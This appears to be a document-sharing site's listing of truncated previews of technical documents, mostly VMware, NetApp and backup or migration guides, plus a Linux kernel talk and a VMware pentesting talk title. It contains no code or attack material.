EXPLORING LINUX KERNEL: THE EASY WAY! By: Ahmed Bilal Numan 1 PROBLEM Explore linux kernel TCP/IP stack Solution Try to understand relative kernel code Available text Run kernel in virtualized environment
VMWARE VSPHERE 5.0 WITH ESXI AND VCENTER
VMWARE VSPHERE 5.0 WITH ESXI AND VCENTER CORPORATE COLLEGE SEMINAR SERIES Date: April 15-19 Presented by: Lone Star Corporate College Format: Location: Classroom instruction 8 a.m.-5 p.m. (five-day session)
VMware Data Recovery. Product Overview
VMware Data Recovery Frequently Asked Questions (FAQ), April 2009 Product Overview What is VMware Data Recovery? VMware Data Recovery is a new backup and recovery product for VMware vsphere users that
Virtual Appliance Setup Guide
Virtual Appliance Setup Guide 2015 Bomgar Corporation. All rights reserved worldwide. BOMGAR and the BOMGAR logo are trademarks of Bomgar Corporation; other trademarks shown are the property of their respective
Virtual Storage Console 4.0 for VMware vsphere Installation and Administration Guide
Virtual Storage Console 4.0 for VMware vsphere Installation and Administration Guide NetApp, Inc. 495 East Java Drive Sunnyvale, CA 94089 U.S.A. Telephone: +1 (408) 822-6000 Fax: +1 (408) 822-4501 Support
BrightStor ARCserve Backup. Best Practices Guide for VMware ESX Server Backup
BrightStor ARCserve Backup Best Practices Guide for VMware ESX Server Backup This documentation and any related computer software help programs (hereinafter referred to as the Documentation ) is for the
NetApp OnCommand Plug-in for VMware Backup and Recovery Administration Guide. For Use with Host Package 1.0
NetApp OnCommand Plug-in for VMware Backup and Recovery Administration Guide For Use with Host Package 1.0 NetApp, Inc. 495 East Java Drive Sunnyvale, CA 94089 USA Telephone: +1 (408) 822-6000 Fax: +1
VMware vsphere Data Protection 6.0
VMware vsphere Data Protection 6.0 TECHNICAL OVERVIEW REVISED FEBRUARY 2015 Table of Contents Introduction.... 3 Architectural Overview... 4 Deployment and Configuration.... 5 Backup.... 6 Application
How to install software on VMware ESXi 4.0/4.1
How to install software on VMware ESXi 4.0/4.1 This section describes the installation and configuration of the Software on VMware ESXi 4.0/4.1 Server. Notice: the version of VMware ESXi 4.0/4.1 should
Monitoring Databases on VMware
Monitoring Databases on VMware Ensure Optimum Performance with the Correct Metrics By Dean Richards, Manager, Sales Engineering Confio Software 4772 Walnut Street, Suite 100 Boulder, CO 80301 www.confio.com
The Incremental Advantage:
The Incremental Advantage: MIGRATE TRADITIONAL APPLICATIONS FROM YOUR ON-PREMISES VMWARE ENVIRONMENT TO THE HYBRID CLOUD IN FIVE STEPS CONTENTS Introduction..................... 2 Five Steps to the Hybrid
Virtually Pwned Pentesting VMware. Claudio Criscione @paradoxengine [email protected]
Virtually Pwned Pentesting VMware Claudio Criscione @paradoxengine [email protected] /me Claudio Criscione The need for security Breaking virtualization means hacking the underlying layer accessing
The Architecture of VMware ESXi WHITE PAPER
The Architecture of VMware ESXi WHITE PAPER Table of Contents Introduction... 3 Components of ESXi... 3 VMkernel... 4 File System... 4 Users and Groups... 4 User Worlds... 4 Direct Console User Interface...
Forklifting to AWS: An Option for Migration to AWS October 2014. Forklifting to AWS: An Option for Migration to AWS
Forklifting to AWS: An Option for Migration to AWS 1 Table of Contents Introduction 3 Migrating from VMware to AWS.3 Using VMware vcenter 4 AWS VM Import Tools.4 Third Party Conversion and Migration Tools
VMware vcenter Log Insight Getting Started Guide
VMware vcenter Log Insight Getting Started Guide vcenter Log Insight 1.5 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by
Setup for Failover Clustering and Microsoft Cluster Service
Setup for Failover Clustering and Microsoft Cluster Service ESX 4.0 ESXi 4.0 vcenter Server 4.0 This document supports the version of each product listed and supports all subsequent versions until the
Unified Storage for the Private Cloud Dennis Chapman NetApp
Unified Storage for the Private Cloud Dennis Chapman NetApp Data Center Transformation Application- Based Silos Zones of Virtualization Private Cloud Public Cloud Apps Servers Network Hybrid Storage IT
Installing and Using the vnios Trial
Installing and Using the vnios Trial The vnios Trial is a software package designed for efficient evaluation of the Infoblox vnios appliance platform. Providing the complete suite of DNS, DHCP and IPAM
Peter Waterman Senior Manager of Technology and Innovation, Managed Hosting Blackboard Inc
Peter Waterman Senior Manager of Technology and Innovation, Managed Hosting Blackboard Inc Blackboard Managed Hosting (sm) Blackboard Inc. is a world leader in e-education software - our online learning
